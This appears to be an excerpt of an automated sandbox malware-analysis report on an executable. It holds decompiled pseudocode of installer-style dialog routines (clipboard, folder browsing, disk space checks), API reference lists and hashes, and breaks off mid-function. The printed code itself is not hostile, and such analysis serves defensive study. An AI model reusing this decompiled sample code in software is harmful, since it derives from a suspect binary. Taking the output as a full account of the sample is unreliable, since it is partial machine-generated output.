                      • OpenClipboard.USER32(00000000), ref: 00405282
                      • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
                      • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
                      • GlobalLock.KERNEL32 ref: 0040529B
                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052AF
                      • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
                      • SetClipboardData.USER32 ref: 004052D2
                      • CloseClipboard.USER32 ref: 004052D8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                      • String ID: hM${
                      • API String ID: 590372296-4057279144
                      • Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                      • Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
                      • Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                      • Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                      				struct HWND__* _v8;
                      				struct HWND__* _v12;
                      				signed int _v16;
                      				intOrPtr _v20;
                      				void* _v24;
                      				long _v28;
                      				int _v32;
                      				signed int _v40;
                      				int _v44;
                      				signed int* _v56;
                      				intOrPtr _v60;
                      				signed int _v64;
                      				long _v68;
                      				void* _v72;
                      				intOrPtr _v76;
                      				intOrPtr _v80;
                      				void* _v84;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				struct HWND__* _t182;
                      				intOrPtr _t183;
                      				int _t189;
                      				int _t196;
                      				intOrPtr _t198;
                      				long _t202;
                      				signed int _t206;
                      				signed int _t217;
                      				void* _t220;
                      				void* _t221;
                      				int _t227;
                      				intOrPtr _t231;
                      				signed int _t232;
                      				signed int _t233;
                      				signed int _t240;
                      				signed int _t242;
                      				signed int _t245;
                      				signed int _t247;
                      				struct HBITMAP__* _t250;
                      				void* _t252;
                      				char* _t268;
                      				signed char _t269;
                      				long _t274;
                      				int _t280;
                      				signed int* _t281;
                      				int _t282;
                      				long _t283;
                      				signed int* _t284;
                      				int _t285;
                      				long _t286;
                      				signed int _t287;
                      				long _t288;
                      				signed int _t291;
                      				int _t294;
                      				signed int _t298;
                      				signed int _t300;
                      				signed int _t302;
                      				intOrPtr _t309;
                      				int* _t310;
                      				void* _t311;
                      				int _t315;
                      				int _t316;
                      				int _t317;
                      				signed int _t318;
                      				void* _t320;
                      				void* _t328;
                      				void* _t331;
                      
                      				_v12 = GetDlgItem(_a4, 0x3f9);
                      				_t182 = GetDlgItem(_a4, 0x408);
                      				_t280 =  *0x423ec8; // 0x4de514
                      				_t320 = SendMessageA;
                      				_v8 = _t182;
                      				_t183 =  *0x423eb0; // 0x4de368
                      				_t315 = 0;
                      				_v32 = _t280;
                      				_v20 = _t183 + 0x94;
                      				if(_a8 != 0x110) {
                      					L23:
                      					__eflags = _a8 - 0x405;
                      					if(_a8 != 0x405) {
                      						_t289 = _a16;
                      					} else {
                      						_a12 = _t315;
                      						_t289 = 1;
                      						_a8 = 0x40f;
                      						_a16 = 1;
                      					}
                      					__eflags = _a8 - 0x4e;
                      					if(_a8 == 0x4e) {
                      						L28:
                      						__eflags = _a8 - 0x413;
                      						_v16 = _t289;
                      						if(_a8 == 0x413) {
                      							L30:
                      							__eflags =  *0x423eb9 & 0x00000002;
                      							if(( *0x423eb9 & 0x00000002) != 0) {
                      								L41:
                      								__eflags = _v16 - _t315;
                      								if(_v16 != _t315) {
                      									_t232 = _v16;
                      									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
                      									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                      										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                      									}
                      									_t233 = _v16;
                      									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
                      									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                      										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
                      										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                      											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
                      											 *_t284 =  *_t284 & 0xffffffdf;
                      											__eflags =  *_t284;
                      										} else {
                      											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                      										}
                      									}
                      								}
                      								goto L48;
                      							}
                      							__eflags = _a8 - 0x413;
                      							if(_a8 == 0x413) {
                      								L33:
                      								__eflags = _a8 - 0x413;
                      								_t289 = 0 | _a8 != 0x00000413;
                      								_t240 = E004046F2(_v8, _a8 != 0x413);
                      								__eflags = _t240 - _t315;
                      								if(_t240 >= _t315) {
                      									_t93 = _t280 + 8; // 0x8
                      									_t310 = _t240 * 0x418 + _t93;
                      									_t289 =  *_t310;
                      									__eflags = _t289 & 0x00000010;
                      									if((_t289 & 0x00000010) == 0) {
                      										__eflags = _t289 & 0x00000040;
                      										if((_t289 & 0x00000040) == 0) {
                      											_t298 = _t289 ^ 0x00000001;
                      											__eflags = _t298;
                      										} else {
                      											_t300 = _t289 ^ 0x00000080;
                      											__eflags = _t300;
                      											if(_t300 >= 0) {
                      												_t298 = _t300 & 0xfffffffe;
                      											} else {
                      												_t298 = _t300 | 0x00000001;
                      											}
                      										}
                      										 *_t310 = _t298;
                      										E0040117D(_t240);
                      										_t242 =  *0x423eb8; // 0x80
                      										_t289 = 1;
                      										_a8 = 0x40f;
                      										_t245 =  !_t242 >> 0x00000008 & 1;
                      										__eflags = _t245;
                      										_a12 = 1;
                      										_a16 = _t245;
                      									}
                      								}
                      								goto L41;
                      							}
                      							_t289 = _a16;
                      							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
                      							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
                      								goto L41;
                      							}
                      							goto L33;
                      						}
                      						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
                      						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
                      							goto L48;
                      						}
                      						goto L30;
                      					} else {
                      						__eflags = _a8 - 0x413;
                      						if(_a8 != 0x413) {
                      							L48:
                      							__eflags = _a8 - 0x111;
                      							if(_a8 != 0x111) {
                      								L56:
                      								__eflags = _a8 - 0x200;
                      								if(_a8 == 0x200) {
                      									SendMessageA(_v8, 0x200, _t315, _t315);
                      								}
                      								__eflags = _a8 - 0x40b;
                      								if(_a8 == 0x40b) {
                      									_t220 =  *0x420474;
                      									__eflags = _t220 - _t315;
                      									if(_t220 != _t315) {
                      										ImageList_Destroy(_t220);
                      									}
                      									_t221 =  *0x42048c;
                      									__eflags = _t221 - _t315;
                      									if(_t221 != _t315) {
                      										GlobalFree(_t221);
                      									}
                      									 *0x420474 = _t315;
                      									 *0x42048c = _t315;
                      									 *0x423f00 = _t315;
                      								}
                      								__eflags = _a8 - 0x40f;
                      								if(_a8 != 0x40f) {
                      									L86:
                      									__eflags = _a8 - 0x420;
                      									if(_a8 == 0x420) {
                      										__eflags =  *0x423eb9 & 0x00000001;
                      										if(( *0x423eb9 & 0x00000001) != 0) {
                      											__eflags = _a16 - 0x20;
                      											_t189 = (0 | _a16 == 0x00000020) << 3;
                      											__eflags = _t189;
                      											_t316 = _t189;
                      											ShowWindow(_v8, _t316);
                      											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                      										}
                      									}
                      									goto L89;
                      								} else {
                      									E004011EF(_t289, _t315, _t315);
                      									__eflags = _a12 - _t315;
                      									if(_a12 != _t315) {
                      										E0040140B(8);
                      									}
                      									__eflags = _a16 - _t315;
                      									if(_a16 == _t315) {
                      										L73:
                      										E004011EF(_t289, _t315, _t315);
                      										__eflags =  *0x423ecc - _t315; // 0x2
                      										_v32 =  *0x42048c;
                      										_t196 =  *0x423ec8; // 0x4de514
                      										_v60 = 0xf030;
                      										_v16 = _t315;
                      										if(__eflags <= 0) {
                      											L84:
                      											InvalidateRect(_v8, _t315, 1);
                      											_t198 =  *0x42367c; // 0x4e3b8b
                      											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
                      											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
                      												E00404610(0x3ff, 0xfffffffb, E004046C5(5));
                      											}
                      											goto L86;
                      										} else {
                      											_t142 = _t196 + 8; // 0x4de51c
                      											_t281 = _t142;
                      											do {
                      												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                      												__eflags = _t202 - _t315;
                      												if(_t202 != _t315) {
                      													_t291 =  *_t281;
                      													_v68 = _t202;
                      													__eflags = _t291 & 0x00000001;
                      													_v72 = 8;
                      													if((_t291 & 0x00000001) != 0) {
                      														_t151 =  &(_t281[4]); // 0x4de52c
                      														_v72 = 9;
                      														_v56 = _t151;
                      														_t154 =  &(_t281[0]);
                      														 *_t154 = _t281[0] & 0x000000fe;
                      														__eflags =  *_t154;
                      													}
                      													__eflags = _t291 & 0x00000040;
                      													if((_t291 & 0x00000040) == 0) {
                      														_t206 = (_t291 & 0x00000001) + 1;
                      														__eflags = _t291 & 0x00000010;
                      														if((_t291 & 0x00000010) != 0) {
                      															_t206 = _t206 + 3;
                      															__eflags = _t206;
                      														}
                      													} else {
                      														_t206 = 3;
                      													}
                      													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
                      													__eflags = _t294;
                      													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                      													SendMessageA(_v8, 0x1102, _t294, _v68);
                      													SendMessageA(_v8, 0x110d, _t315,  &_v72);
                      												}
                      												_v16 = _v16 + 1;
                      												_t281 =  &(_t281[0x106]);
                      												__eflags = _v16 -  *0x423ecc; // 0x2
                      											} while (__eflags < 0);
                      											goto L84;
                      										}
                      									} else {
                      										_t282 = E004012E2( *0x42048c);
                      										E00401299(_t282);
                      										_t217 = 0;
                      										_t289 = 0;
                      										__eflags = _t282 - _t315;
                      										if(_t282 <= _t315) {
                      											L72:
                      											SendMessageA(_v12, 0x14e, _t289, _t315);
                      											_a16 = _t282;
                      											_a8 = 0x420;
                      											goto L73;
                      										} else {
                      											goto L69;
                      										}
                      										do {
                      											L69:
                      											_t309 = _v20;
                      											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
                      											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
                      												_t289 = _t289 + 1;
                      												__eflags = _t289;
                      											}
                      											_t217 = _t217 + 1;
                      											__eflags = _t217 - _t282;
                      										} while (_t217 < _t282);
                      										goto L72;
                      									}
                      								}
                      							}
                      							__eflags = _a12 - 0x3f9;
                      							if(_a12 != 0x3f9) {
                      								goto L89;
                      							}
                      							__eflags = _a12 >> 0x10 - 1;
                      							if(_a12 >> 0x10 != 1) {
                      								goto L89;
                      							}
                      							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                      							__eflags = _t227 - 0xffffffff;
                      							if(_t227 == 0xffffffff) {
                      								goto L89;
                      							}
                      							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                      							__eflags = _t283 - 0xffffffff;
                      							if(_t283 == 0xffffffff) {
                      								L54:
                      								_t283 = 0x20;
                      								L55:
                      								E00401299(_t283);
                      								SendMessageA(_a4, 0x420, _t315, _t283);
                      								_a12 = 1;
                      								_a16 = _t315;
                      								_a8 = 0x40f;
                      								goto L56;
                      							}
                      							_t231 = _v20;
                      							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
                      							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
                      								goto L55;
                      							}
                      							goto L54;
                      						}
                      						goto L28;
                      					}
                      				} else {
                      					 *0x423f00 = _a4;
                      					_t247 =  *0x423ecc; // 0x2
                      					_t285 = 2;
                      					_v28 = 0;
                      					_v16 = _t285;
                      					 *0x42048c = GlobalAlloc(0x40, _t247 << 2);
                      					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
                      					 *0x420480 =  *0x420480 | 0xffffffff;
                      					_v24 = _t250;
                      					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
                      					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                      					 *0x420474 = _t252;
                      					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                      					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
                      					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                      						SendMessageA(_v8, 0x111b, 0x10, 0);
                      					}
                      					DeleteObject(_v24);
                      					_t286 = 0;
                      					do {
                      						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                      						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                      							if(_t286 != 0x20) {
                      								_v16 = _t315;
                      							}
                      							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
                      						}
                      						_t286 = _t286 + 1;
                      					} while (_t286 < 0x21);
                      					_t317 = _a16;
                      					_t287 = _v16;
                      					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                      					_push(0x15);
                      					E00403E37(_a4);
                      					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                      					_push(0x16);
                      					E00403E37(_a4);
                      					_t318 = 0;
                      					_t288 = 0;
                      					_t328 =  *0x423ecc - _t318; // 0x2
                      					if(_t328 <= 0) {
                      						L19:
                      						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                      						goto L20;
                      					} else {
                      						_t311 = _v32 + 8;
                      						_v24 = _t311;
                      						do {
                      							_t268 = _t311 + 0x10;
                      							if( *_t268 != 0) {
                      								_v60 = _t268;
                      								_t269 =  *_t311;
                      								_t302 = 0x20;
                      								_v84 = _t288;
                      								_v80 = 0xffff0002;
                      								_v76 = 0xd;
                      								_v64 = _t302;
                      								_v40 = _t318;
                      								_v68 = _t269 & _t302;
                      								if((_t269 & 0x00000002) == 0) {
                      									__eflags = _t269 & 0x00000004;
                      									if((_t269 & 0x00000004) == 0) {
                      										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                      									} else {
                      										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                      									}
                      								} else {
                      									_v76 = 0x4d;
                      									_v44 = 1;
                      									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                      									_v28 = 1;
                      									 *( *0x42048c + _t318 * 4) = _t274;
                      									_t288 =  *( *0x42048c + _t318 * 4);
                      								}
                      							}
                      							_t318 = _t318 + 1;
                      							_t311 = _v24 + 0x418;
                      							_t331 = _t318 -  *0x423ecc; // 0x2
                      							_v24 = _t311;
                      						} while (_t331 < 0);
                      						if(_v28 != 0) {
                      							L20:
                      							if(_v16 != 0) {
                      								E00403E6C(_v8);
                      								_t280 = _v32;
                      								_t315 = 0;
                      								__eflags = 0;
                      								goto L23;
                      							} else {
                      								ShowWindow(_v12, 5);
                      								E00403E6C(_v12);
                      								L89:
                      								return E00403E9E(_a8, _a12, _a16);
                      							}
                      						}
                      						goto L19;
                      					}
                      				}
                      			}

                      APIs
                      • GetDlgItem.USER32 ref: 00404789
                      • GetDlgItem.USER32 ref: 00404796
                      • GlobalAlloc.KERNEL32(00000040,00000002), ref: 004047E2
                      • LoadBitmapA.USER32 ref: 004047F5
                      • SetWindowLongA.USER32(?,000000FC,00404D73), ref: 0040480F
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404823
                      • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404837
                      • SendMessageA.USER32(?,00001109,00000002), ref: 0040484C
                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404858
                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040486A
                      • DeleteObject.GDI32(?), ref: 0040486F
                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040489A
                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004048A6
                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040493B
                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404966
                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040497A
                      • GetWindowLongA.USER32 ref: 004049A9
                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 004049B7
                      • ShowWindow.USER32(?,00000005), ref: 004049C8
                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404ACB
                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B30
                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404B45
                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404B69
                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404B8F
                      • ImageList_Destroy.COMCTL32(?), ref: 00404BA4
                      • GlobalFree.KERNEL32 ref: 00404BB4
                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C24
                      • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404CCD
                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404CDC
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404CFC
                      • ShowWindow.USER32(?,00000000), ref: 00404D4A
                      • GetDlgItem.USER32 ref: 00404D55
                      • ShowWindow.USER32(00000000), ref: 00404D5C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                      • String ID: $M$N$hM
                      • API String ID: 1638840714-3240060286
                      • Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                      • Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
                      • Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                      • Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 78%
                      			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
                      				signed int _v8;
                      				struct HWND__* _v12;
                      				long _v16;
                      				long _v20;
                      				char _v24;
                      				long _v28;
                      				char _v32;
                      				intOrPtr _v36;
                      				long _v40;
                      				signed int _v44;
                      				CHAR* _v52;
                      				intOrPtr _v56;
                      				intOrPtr _v60;
                      				intOrPtr _v64;
                      				CHAR* _v68;
                      				void _v72;
                      				char _v76;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr _t81;
                      				long _t86;
                      				signed char* _t88;
                      				void* _t94;
                      				signed int _t95;
                      				signed short _t113;
                      				signed int _t117;
                      				char* _t122;
                      				intOrPtr _t124;
                      				intOrPtr* _t138;
                      				signed int* _t145;
                      				intOrPtr _t147;
                      				signed int _t148;
                      				signed int _t153;
                      				struct HWND__* _t159;
                      				CHAR* _t162;
                      				int _t163;
                      
                      				_t81 =  *0x41fc68; // 0x0
                      				_v36 = _t81;
                      				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
                      				_v8 =  *((intOrPtr*)(_t81 + 0x38));
                      				if(_a8 == 0x40b) {
                      					E0040532A(0x3fb, _t162);
                      					E00405CE3(_t162);
                      				}
                      				if(_a8 != 0x110) {
                      					L8:
                      					if(_a8 != 0x111) {
                      						L20:
                      						if(_a8 == 0x40f) {
                      							L22:
                      							_v8 = _v8 & 0x00000000;
                      							_v12 = _v12 & 0x00000000;
                      							E0040532A(0x3fb, _t162);
                      							if(E00405659(_t180, _t162) == 0) {
                      								_v8 = 1;
                      							}
                      							E00405A85(0x41f460, _t162);
                      							_t145 = 0;
                      							_t86 = E00405DA3(0);
                      							_v16 = _t86;
                      							if(_t86 == 0) {
                      								L31:
                      								E00405A85(0x41f460, _t162);
                      								_t88 = E0040560C(0x41f460);
                      								if(_t88 != _t145) {
                      									 *_t88 =  *_t88 & 0x00000000;
                      								}
                      								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
                      									_t153 = _a8;
                      									goto L37;
                      								} else {
                      									_t163 = 0x400;
                      									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
                      									_v12 = 1;
                      									goto L38;
                      								}
                      							} else {
                      								if(0 == 0x41f460) {
                      									L30:
                      									_t145 = 0;
                      									goto L31;
                      								} else {
                      									goto L26;
                      								}
                      								while(1) {
                      									L26:
                      									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
                      									if(_t113 != 0) {
                      										break;
                      									}
                      									if(_t145 != 0) {
                      										 *_t145 =  *_t145 & _t113;
                      									}
                      									_t145 = E004055BF(0x41f460) - 1;
                      									 *_t145 = 0x5c;
                      									if(_t145 != 0x41f460) {
                      										continue;
                      									} else {
                      										goto L30;
                      									}
                      								}
                      								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
                      								_v12 = 1;
                      								_t145 = 0;
                      								L37:
                      								_t163 = 0x400;
                      								L38:
                      								_t94 = E004046C5(5);
                      								if(_v12 != _t145 && _t153 < _t94) {
                      									_v8 = 2;
                      								}
                      								_t147 =  *0x42367c; // 0x4e3b8b
                      								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
                      									E00404610(0x3ff, 0xfffffffb, _t94);
                      									if(_v12 == _t145) {
                      										SetDlgItemTextA(_a4, _t163, 0x41f450);
                      									} else {
                      										E00404610(_t163, 0xfffffffc, _t153);
                      									}
                      								}
                      								_t95 = _v8;
                      								 *0x423f44 = _t95;
                      								if(_t95 == _t145) {
                      									_v8 = E0040140B(7);
                      								}
                      								if(( *(_v36 + 0x14) & _t163) != 0) {
                      									_v8 = _t145;
                      								}
                      								E00403E59(0 | _v8 == _t145);
                      								if(_v8 == _t145 &&  *0x420484 == _t145) {
                      									E0040420A();
                      								}
                      								 *0x420484 = _t145;
                      								goto L53;
                      							}
                      						}
                      						_t180 = _a8 - 0x405;
                      						if(_a8 != 0x405) {
                      							goto L53;
                      						}
                      						goto L22;
                      					}
                      					_t117 = _a12 & 0x0000ffff;
                      					if(_t117 != 0x3fb) {
                      						L12:
                      						if(_t117 == 0x3e9) {
                      							_t148 = 7;
                      							memset( &_v72, 0, _t148 << 2);
                      							_v76 = _a4;
                      							_v68 = 0x420498;
                      							_v56 = E004045AA;
                      							_v52 = _t162;
                      							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
                      							_t122 =  &_v76;
                      							_v60 = 0x41;
                      							__imp__SHBrowseForFolderA(_t122);
                      							if(_t122 == 0) {
                      								_a8 = 0x40f;
                      							} else {
                      								__imp__CoTaskMemFree(_t122);
                      								E00405578(_t162);
                      								_t124 =  *0x423eb0; // 0x4de368
                      								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
                      								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
                      									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
                      									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
                      										lstrcatA(_t162, 0x422e40);
                      									}
                      								}
                      								 *0x420484 =  &(( *0x420484)[0]);
                      								SetDlgItemTextA(_a4, 0x3fb, _t162);
                      							}
                      						}
                      						goto L20;
                      					}
                      					if(_a12 >> 0x10 != 0x300) {
                      						goto L53;
                      					}
                      					_a8 = 0x40f;
                      					goto L12;
                      				} else {
                      					_t159 = _a4;
                      					_v12 = GetDlgItem(_t159, 0x3fb);
                      					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
                      						E00405578(_t162);
                      					}
                      					 *0x423678 = _t159;
                      					SetWindowTextA(_v12, _t162);
                      					_push( *((intOrPtr*)(_a16 + 0x34)));
                      					_push(1);
                      					E00403E37(_t159);
                      					_push( *((intOrPtr*)(_a16 + 0x30)));
                      					_push(0x14);
                      					E00403E37(_t159);
                      					E00403E6C(_v12);
                      					_t138 = E00405DA3(7);
                      					if(_t138 == 0) {
                      						L53:
                      						return E00403E9E(_a8, _a12, _a16);
                      					}
                      					 *_t138(_v12, 1);
                      					goto L8;
                      				}
                      			}

                      APIs
                      • GetDlgItem.USER32 ref: 004042C1
                      • SetWindowTextA.USER32(?,?), ref: 004042EE
                      • SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
                      • CoTaskMemFree.OLE32(00000000), ref: 004043AE
                      • lstrcmpiA.KERNEL32(bxrmcpz,00420498,00000000,?,?), ref: 004043E0
                      • lstrcatA.KERNEL32(?,bxrmcpz), ref: 004043EC
                      • SetDlgItemTextA.USER32 ref: 004043FC
                        • Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                        • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                      • GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
                      • SetDlgItemTextA.USER32 ref: 00404549
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                      • String ID: A$C:\Users\user\AppData\Local\Temp$bxrmcpz$hM
                      • API String ID: 2246997448-548302372
                      • Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                      • Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
                      • Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                      • Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 74%
                      			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                      				signed int _v8;
                      				struct _ITEMIDLIST* _v12;
                      				signed int _v16;
                      				signed char _v20;
                      				signed char _v24;
                      				signed int _v28;
                      				signed int _t36;
